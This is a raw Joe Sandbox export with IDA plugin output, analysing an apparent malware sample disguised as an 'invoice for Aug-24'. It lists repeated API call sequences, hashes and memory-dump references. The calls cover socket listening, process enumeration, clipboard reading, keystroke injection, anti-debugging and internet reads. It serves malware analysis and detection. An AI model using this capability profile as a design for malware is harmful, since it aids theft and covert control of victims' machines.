                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$closesocket$bindlistensocket
                                                          • String ID:
                                                          • API String ID: 540024437-0
                                                          • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                          • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                          • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                          • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                          • API String ID: 0-2872873767
                                                          • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                          • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                          • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                          • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                          • __wsplitpath.LIBCMT ref: 00475644
                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                          • _wcscat.LIBCMT ref: 00475657
                                                          • __wcsicoll.LIBCMT ref: 0047567B
                                                          • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                          • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                          • String ID:
                                                          • API String ID: 2547909840-0
                                                          • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                          • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                          • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                          • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                          APIs
                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                          • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                          • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                          • FindClose.KERNEL32(?), ref: 004525FF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                          • String ID: *.*$\VH
                                                          • API String ID: 2786137511-2657498754
                                                          • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                          • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                          • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                          • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                          • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                          • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                          • String ID: pqI
                                                          • API String ID: 2579439406-2459173057
                                                          • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                          • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                          • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                          • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                          APIs
                                                          • __wcsicoll.LIBCMT ref: 00433349
                                                          • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                          • __wcsicoll.LIBCMT ref: 00433375
                                                          • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: __wcsicollmouse_event
                                                          • String ID: DOWN
                                                          • API String ID: 1033544147-711622031
                                                          • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                          • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                          • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                          • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                          • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                          • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                          • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                          • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: KeyboardMessagePostState$InputSend
                                                          • String ID:
                                                          • API String ID: 3031425849-0
                                                          • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                          • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                          • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                          • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                          APIs
                                                            • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                          • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 4170576061-0
                                                          • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                          • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                          • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                          • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                          APIs
                                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                          • IsWindowVisible.USER32 ref: 0047A368
                                                          • IsWindowEnabled.USER32 ref: 0047A378
                                                          • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                          • IsIconic.USER32 ref: 0047A393
                                                          • IsZoomed.USER32 ref: 0047A3A1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                          • String ID:
                                                          • API String ID: 292994002-0
                                                          • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                          • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                          • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                          • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                          APIs
                                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                          • CoInitialize.OLE32(00000000), ref: 00478442
                                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                          • CoUninitialize.OLE32 ref: 0047863C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                          • String ID: .lnk
                                                          • API String ID: 886957087-24824748
                                                          • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                          • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                          • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                          • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                          APIs
                                                          • OpenClipboard.USER32(?), ref: 0046DCE7
                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                          • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                          • CloseClipboard.USER32 ref: 0046DD0D
                                                          • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                          • CloseClipboard.USER32 ref: 0046DD41
                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                          • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                          • CloseClipboard.USER32 ref: 0046DD99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                          • String ID:
                                                          • API String ID: 15083398-0
                                                          • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                          • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                          • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                          • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: U$\
                                                          • API String ID: 4104443479-100911408
                                                          • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                          • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                          • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                          • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Find$File$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 3541575487-0
                                                          • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                          • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                          • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                          • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                          • FindClose.KERNEL32(00000000), ref: 004339EB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: FileFind$AttributesCloseFirst
                                                          • String ID:
                                                          • API String ID: 48322524-0
                                                          • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                          • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                          • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                          • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                          APIs
                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                          • String ID:
                                                          • API String ID: 901099227-0
                                                          • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                          • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                          • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                          • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                          APIs
                                                          • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
